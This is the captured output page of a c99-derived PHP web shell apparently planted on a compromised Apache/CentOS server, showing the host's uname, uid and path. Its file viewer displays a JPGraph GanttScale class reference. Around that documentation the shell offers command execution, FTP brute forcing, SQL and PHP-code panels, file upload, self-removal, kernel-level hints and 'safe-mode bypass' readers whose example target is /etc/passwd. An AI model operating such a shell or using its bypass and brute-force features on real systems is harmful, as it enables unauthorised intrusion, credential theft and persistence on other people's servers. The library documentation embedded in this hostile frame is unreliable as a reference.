!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/jpgraph/docs/ref/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     GanttScale.html (11.09 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

CLASS GanttScale
(Defined in: jpgraph_gantt.php : 1812)
 GanttScale 
 SetDateLocale() 
 SetRange() 
 SetTableTitleBackground() 
 SetVertLayout() 
 SetWeekStart() 
 UseWeekendBackground() 
 

Class usage and Overview
Internal class to represent the scale used for Gantt graphs. The scale is accessible as GanttGraph::scale The following public available subobjects are available
  • tableTitle (Instance of class TextProperty)
  • divider (Instance of class LineProperty)
  • actinfo (Instance of class GanttActivityInfo)
  • year (Instance of HeaderProperty)
  • month (Instance of HeaderProperty)
  • week (Instance of HeaderProperty)
  • day (Instance of HeaderProperty)
  • hour (Instance of HeaderProperty)
  • minute (Instance of HeaderProperty)

 

See also related classes:
GanttGraph, HeaderProperty, GanttActivityInfo and TextProperty

 


Class Methods

 

 

Specify locale to use for scale.

ArgumentDefaultDescription
$aLocale  String to specify locale

Description
Specify locale to use for scale. If no locale is specified then the default locale for the installed system will be used. 
 
See also
DateLocale::DateLocale

Example

$ganttgraph->scale->SetDateLocale('US_en');

 

 

Specify date range for scale.

ArgumentDefaultDescription
$aMin  Min date
$aMax  Max date

Description
Specify scale min and max date either as timestamp or as date strings. Always round to the nearest week boundary 

Example

$ganttgraph->scale->SetRange("2002-11-23", "2003-03-31");

 

 

Specify background for the table title area.

ArgumentDefaultDescription
$aColor  Color

Description
Specify background for the table title area (upper left corner of the table). 

Example

$ganttgraph->scale->SetTableTitleBackground('lightblue');

 

 

Specify the vertical layout fro rows.

ArgumentDefaultDescription
$aLayout  Vertical layout parameter

Description
Should the layout be from top or even. Valid parameters are
  • GANTT_EVEN, Spread out the rows even over the whole height of the plot.
  • GANTT_FROMTOP, Use the minimum height required for the rows starting from top.
Note that if you use auto-sizing of the Gantt chart these parameters have little effect since the total height of the image will always be so that all rows fit exactly.  

Example

$granntgraph->scale->SetVertLayout(GANTT_FROMTOP);

 

 

Specify which weekday should start the week

ArgumentDefaultDescription
$aStartDay  Weekday, (0-6)

Description
Which day should the week start? 0==Sun, 1==Monday, 2==Tuesday etc By default weeks start on Mondays. 
 
See also
GanttScale::SetRange

Example

$granttgraph->SetWeekStart(1);

 

 

Determine if the background color for weekends in the scale should extend down in the plot area.

ArgumentDefaultDescription
$aShow  True=Use the weekend background color in the ganttgraph

Description
Determine if the background color for weekends in the scale should extend down in the plot area. 

Example

$ganttgraph->scale->USeWeekendBackground();



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--